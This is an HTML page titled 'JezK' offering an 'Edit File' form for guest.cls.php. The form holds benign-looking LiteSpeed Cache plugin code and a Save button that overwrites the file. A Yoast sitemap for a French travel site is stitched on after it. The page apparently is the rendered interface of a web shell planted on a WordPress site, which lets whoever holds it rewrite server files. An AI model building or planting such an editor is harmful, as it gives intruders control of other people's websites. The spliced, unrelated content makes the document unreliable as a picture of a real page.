
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: guest.cls.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Guest mode management class.
 *
 * Handles syncing of Guest Mode IP and UA lists from QUIC.cloud.
 *
 * @package LiteSpeed
 * @since   7.7
 */

namespace LiteSpeed;

defined( 'WPINC' ) || exit();

/**
 * Class Guest
 *
 * Extends Cloud class to provide Guest Mode related functionality.
 */
class Guest extends Cloud {

	const LOG_TAG = '👤';

	const TYPE_SYNC = 'sync';

	/**
	 * Cron handler for daily Guest Mode sync.
	 *
	 * @since 7.7
	 * @return void
	 */
	public static function cron() {
		self::debug( 'Cron: starting daily sync' );
		self::cls()-&gt;sync_lists();
	}

	/**
	 * Sync Guest Mode IP and UA lists.
	 *
	 * Fetches the latest IP and UA lists from QUIC.cloud API and saves them locally.
	 *
	 * @since 7.7
	 * @return array{success: bool, message: string}
	 */
	public function sync_lists() {
		self::debug( 'Starting Guest Mode lists sync' );

		$cloud_dir = LITESPEED_STATIC_DIR . '/cloud';

		$results = [
			'ips' =&gt; false,
			'uas' =&gt; false,
		];

		foreach ( [ 'ips', 'uas' ] as $type ) {
			$url  = $this-&gt;_cloud_server_wp . '/gm_' . $type;
			$file = $cloud_dir . '/gm_' . $type . '.txt';
			self::debug( 'Fetching: ' . $url );
			$temp = File::download( $url, $file, 15 );
			if ( is_wp_error( $temp ) ) {
				self::debug( 'Fetch failed: ' . $temp-&gt;get_error_code() );
			} elseif ( File::publish_temp_file( $temp, $file ) ) {
				self::debug( 'Guest Mode ' . $type . ' synced' );
				$results[ $type ] = true;
			}
		}

		$success = $results['ips'] &amp;&amp; $results['uas'];
		$message = $success
			? __( 'Guest Mode lists synced successfully.', 'litespeed-cache' )
			: __( 'Failed to sync Guest Mode lists.', 'litespeed-cache' );

		return [
			'success' =&gt; $success,
			'message' =&gt; $message,
		];
	}

	/**
	 * Handle all request actions from main class.
	 *
	 * @since 7.7
	 * @return void
	 */
	public function handler() {
		$type = Router::verify_type();

		switch ( $type ) {
			case self::TYPE_SYNC:
				$result = $this-&gt;sync_lists();
				if ( Router::is_ajax() ) {
					wp_send_json( $result );
				}
				if ( $result['success'] ) {
					Admin_Display::success( $result['message'] );
				} else {
					Admin_Display::error( $result['message'] );
				}
				break;

			default:
				break;
		}

		Admin::redirect();
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//ohmytrips.fr/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://ohmytrips.fr/post-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/page-sitemap.xml</loc>
		<lastmod>2026-09-25T15:37:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/category-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/author-sitemap.xml</loc>
		<lastmod>2025-10-07T21:23:02+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->